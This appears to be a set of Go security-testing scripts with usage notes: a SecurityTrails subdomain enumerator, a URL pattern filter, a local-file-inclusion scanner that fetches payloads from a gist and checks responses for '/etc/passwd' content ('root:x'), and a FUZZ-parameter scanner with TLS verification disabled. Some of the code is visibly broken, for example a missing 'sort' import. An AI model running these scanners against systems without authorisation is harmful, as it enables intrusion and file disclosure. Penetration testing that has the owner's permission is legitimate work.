package main
import (
"fmt"
"net/http"
"io/ioutil"
"encoding/json"
"os"
)
func getSubdomains(domain string, filepath string) {
url := "https://api.securitytrails.com/v1/domain/" + domain + "/subdomains"
query := "children_only=true"
client := &http.Client{}
req, _ := http.NewRequest("GET", url, nil)
req.Header.Add("accept", "application/json")
req.Header.Add("apikey", "API Securitytrails")
q := req.URL.Query()
q.Add("children_only", "true")
req.URL.RawQuery = q.Encode()
res, _ := client.Do(req)
defer res.Body.Close()
body, _ := ioutil.ReadAll(res.Body)
var result map[string]interface{}
json.Unmarshal([]byte(body), &result)
subdomains := result["subdomains"].([]interface{})
f, _ := os.Create(filepath)
defer f.Close()
for _, subdomain := range subdomains {
f.WriteString(subdomain.(string) + "." + domain + "\n")
}
fmt.Println("Subdomains saved in", filepath)
}
func main() {
if len(os.Args) < 2 {
fmt.Println("Please provide a domain name")
os.Exit(1)
}
domain := os.Args[1]
filepath := domain + "_subdomains.txt"
getSubdomains(domain, filepath)
}used to fetch a list of subdomains of a domain, it uses the API from SecurityTrails to retrieve a list of subdomains
package main
import (
"encoding/json"
"flag"
"fmt"
"io/ioutil"
"net/http"
"os"
"strings"
)
func main() {
jsonUrl := flag.String("jsonUrl", "https://gist.githubusercontent.com/0x3n0/fa105b397c3b367c3203927af987b2d6/raw/622ddaaa3a7b3a927eca2b8bcce4dec9dab8d71e/patterns.json", "URL of json file")
cutFlag := flag.Bool("cut", false, "Remove query parameters from URLs")
getFlag := flag.String("get", "", "Filter URLs by parameters")
flag.Parse()
if len(os.Args) > 1 && (os.Args[1] == "-h" || os.Args[1] == "--help") {
fmt.Println("Usage: go run script.go [-jsonUrl=<json_url>] [-cut] [-get=<parameters>]")
fmt.Println("The [-jsonUrl=<json_url>] URL json file containing the patterns")
fmt.Println("The [-cut] remove query parameters from the URLs.")
fmt.Println("The [-get=<parameters>] filter URLs by parameters.")
return
}
input, _ := ioutil.ReadAll(os.Stdin)
output := string(input)
resp, err := http.Get(*jsonUrl)
if err != nil {
fmt.Println(err)
os.Exit(1)
}
defer resp.Body.Close()
byteValue, _ := ioutil.ReadAll(resp.Body)
var jsonData map[string][]string
json.Unmarshal(byteValue, &jsonData)
urlMap := make(map[string]bool)
urls := strings.Split(output, "\n")
for _, url := range urls {
for get, value := range jsonData {
if *getFlag != "" && get != *getFlag {
continue
}
for _, param := range value {
if strings.Contains(url, param) {
if *getFlag != "" && get != *getFlag {
continue
}
if *cutFlag {
index := strings.Index(url, "&")
if index != -1 {
url = url[:index+1]
}
if !urlMap[url] {
urlMap[url] = true
fmt.Println(url)
}
} else {
if !urlMap[url] {
urlMap[url] = true
fmt.Printf("[%s] %s\n", get, url)
}
}
break
}
}
}
}
}a code written to analyze and identify URLs that are a potential source of security threats. this code retrieves URL pattern data from a JSON file hosted on gist.github.com then matches and displays URLs that match the pattern specified inside by jsonUrl and parses the data in JSON format. This code can be used as an aid in the security analysis and monitoring process by identifying URLs that are potential sources of threats.
Run gau to fetch all URLs from a domain
gau domain.com | go run script.go
use domainList.txt
cat domainList.txt | go run script.go
Gunakan flag untuk mengelompokkan URL berdasarkan parameter tertentu
gau domain.com | go run script.go -get=parameter
Use the flag to remove query parameters from the URL
gau domain.com | go run script.go -cut
Use the flag to specify the URL of the JSON file to use
gau domain.com | go run script.go -jsonUrl=https://gist.githubusercontent.com/0x3n0/fa105b397c3b367c3203927af987b2d6/raw/7bd4c313d4939dc58d2700056a90fd8150efab9f/patterns.json
package main
import (
"bufio"
"encoding/json"
"fmt"
"io/ioutil"
"net/http"
"os"
"strings"
"sync"
)
type PayloadList struct {
Payload []string `json:"payload"`
}
func main() {
colorReset := "\033[0m"
colorRed := "\033[31m"
sc := bufio.NewScanner(os.Stdin)
jobs := make(chan string)
var wg sync.WaitGroup
// Get payloads from JSON
payloads := getPayloads()
sort.Strings(payloads.Payload)
for i := 0; i < 20; i++ {
wg.Add(1)
go func() {
defer wg.Done()
for domain := range jobs {
for _, payload := range payloads.Payload {
full_url := domain + payload
resp, err := http.Get(full_url)
if err != nil {
continue
}
body, err := ioutil.ReadAll(resp.Body)
if err != nil {
fmt.Println(err)
}
sb := string(body)
check_result := strings.Contains(sb, "root:x")
if check_result != false {
fmt.Println(string(colorRed), "Vulnerable To LFI:", full_url, string(colorReset))
} else {
fmt.Println("Not:", full_url)
}
}
}
}()
}
for sc.Scan() {
domain := sc.Text()
jobs <- domain
}
close(jobs)
wg.Wait()
}
func getPayloads() PayloadList {
url := "https://gist.githubusercontent.com/0x3n0/45cb26991f3869b004d955589a00a9bf/raw/b57a8f79400fb6748e88c2e1e15be46c2203a640/list-json"
resp, err := http.Get(url)
if err != nil {
fmt.Println(err)
}
defer resp.Body.Close()
body, err := ioutil.ReadAll(resp.Body)
if err != nil {
fmt.Println(err)
}
var payloads PayloadList
json.Unmarshal(body, &payloads)
return payloads
}used to perform LFI vulnerability testing. This script will read input from the command line as the domain to be tested, then check for LFI vulnerabilities by taking the payload from jsonUrl and trying to access each payload with the given domain as input. This script also uses several goroutines to improve performance in checking LFI vulnerabilities.
gau domain.com | scrpt.go -cut | LFI.go
cat ParameterDomainList.txt | go run LFI.go
package main
import (
"fmt"
"net/http"
"sync"
"io/ioutil"
"time"
"net"
"crypto/tls"
"flag"
"bufio"
"os"
"log"
"strings"
"regexp"
)
var Threads int
var recheck_url string
var header string
var method string
var body string
var payload string
var base_size int
var matcher string
var payloads[] string
var confirm[] string
var verify bool
var grep string
var greps[] string
var req * http.Request
func getClient() * http.Client {
tr := & http.Transport {
MaxIdleConns: 30,
IdleConnTimeout: time.Second,
TLSClientConfig: & tls.Config {
InsecureSkipVerify: true,
},
DialContext: ( & net.Dialer {
Timeout: time.Second * 10,
KeepAlive: time.Second,
}).DialContext,
}
re := func(req * http.Request, via[] * http.Request) error {
return http.ErrUseLastResponse
}
return &http.Client {
Transport: tr,
CheckRedirect: re,
Timeout: time.Second * 10,
}
}
func custom_header(header string) {
parse := strings.ReplaceAll(header, "\\n", "\n")
var h_name string
var v_name string
r := regexp.MustCompile(`(.*): \s(.*)`)
matches := r.FindStringSubmatch(parse)
for i,
match := range matches {
if i == 1 {
h_name = match
}
if i == 2 {
v_name = match
}
}
req.Header.Set(h_name, v_name)
}
func base_request(c * http.Client, u string, method string, matcher string, header string)(int, string) {
req, err := http.NewRequest(method, u, nil)
if err != nil {
log.Fatal(err)
}
if header != "" {
custom_header(header)
}
resp, err := c.Do(req)
if err != nil {
log.Fatal(err)
}
defer resp.Body.Close()
contents, err := ioutil.ReadAll(resp.Body)
if err != nil {
log.Fatal(err)
}
if matcher == "check" {
body = string(contents)
}
base_size = len(contents)
return base_size, body
}
func requester(c * http.Client, u string, method string, list[] string, verify bool, matcher string, header string) {
req_base, _:= base_request(c, u, method, matcher, header)
for _, test := range list {
url := strings.Replace(u, "FUZZ", test, -1)
req_test,
_:= base_request(c, url, method, matcher, header)
if req_test != req_base {
if verify != true {
fmt.Printf("[!] Potential vulnerability found at: %s\n", url)
fmt.Println("[] Storing for confirmation..")
}
confirm = append(confirm, url)
}
}
if verify != true {
fmt.Println("[>]...scanning complete")
fmt.Println("[] Please use the verify option to confirm any potential vulnerabilities")
}
}
func main() {
flag.IntVar( & Threads, "t", 30, "Number of threads")
flag.StringVar( & recheck_url, "u", "", "URL to test")
flag.StringVar( & header, "H", "", "Custom headers")
flag.StringVar( & method, "X", "GET", "HTTP method")
flag.StringVar( & payload, "p", "", "Payload list")
flag.StringVar( & matcher, "m", "", "Match string")
flag.BoolVar( & verify, "v", false, "Verify potential vulnerabilities")
flag.StringVar( & grep, "g", "", "Grep for string")
flag.Parse()
if recheck_url == "" {
fmt.Println("[!] Please provide a URL to test using -u option")
os.Exit(1)
}
if payload != "" {
f, err := os.Open(payload)
if err != nil {
log.Fatal(err)
}
defer f.Close()
scanner := bufio.NewScanner(f)
for scanner.Scan() {
payloads = append(payloads, scanner.Text())
}
if err := scanner.Err();
err != nil {
log.Fatal(err)
}
}
if grep != "" {
greps = strings.Split(grep, ",")
}
var wg sync.WaitGroup
c := getClient()
for i := 0;
i < Threads;
i++{
wg.Add(1)
go func() {
defer wg.Done()
requester(c, recheck_url, method, payloads, verify, matcher, header)
}()
}
wg.Wait()
if verify == true {
for _, url := range confirm {
req_test, _:= base_request(c, url, method, matcher, header)
if req_test != base_size {
fmt.Printf("[!] VULNERABLE: %s\n", url)
if grep != "" {
for _, check := range greps {
if strings.Contains(body, check) {
fmt.Printf("[~] %s found in response\n", check)
}
}
}
} else {
fmt.Printf("[~] %s is not vulnerable\n", url)
}
}
}
}To run this script, you will need to provide some required arguments. For example, to run the script with 30 threads, the URL to be tested, and a custom header, you can run the following command in the terminal or Command Prompt:
go run script.go -t 30 -u "http://example.com" -H "Custom-Header: value"
Some other required arguments are:
-tor--threads: the number of threads to be used in the testing process. Default: 30-uor--url: the URL to be tested. This must be provided for the script to function.-Hor--header: the custom header to be used in the request. You can provide one or multiple headers in the format of "header-name: value"-mor--method: the HTTP method to be used in the request. Default: GET-por--payload: the payload to be used in the testing process. The payload should be in the form of a file containing a list of payloads to be used, one per line.-msor--matcher: the method used to compare the size of the response from the base request and the request being tested. Default: "size"-vor--verify: the option to confirm any potential vulnerabilities found after the testing process is completed. Default: false
Some other optional arguments that you can use are:
-gor--grep: the string to be used to match the response from the request being tested. You can provide one or multiple strings to be used in the matching process, separated by a comma.
To run the script, you can use the go run command like this:
go run script.go -t 30 -u "http://example.com" -H "Custom-Header: value" -m "POST" -p payloads.txt -ms "size" -v
In this example, the script will run with 30 threads, testing the URL "http://example.com", using the POST method and the custom header Custom-Header: value. The payloads will be taken from the file "payloads.txt" and the "size" method will be used to compare the size of the response. Any potential vulnerabilities found will be confirmed after the testing process is completed.
Please keep in mind that this code ignores SSL certificate verification, make sure to change the InsecureSkipVerify option to false before running this code in production environments. Also make sure that you have Go installed on your computer and in your PATH, because this code uses GO library.
Also remember that this script is used to test vulnerabilities in web applications, make sure not to run this script on web applications that you do not own or without permission from the owner.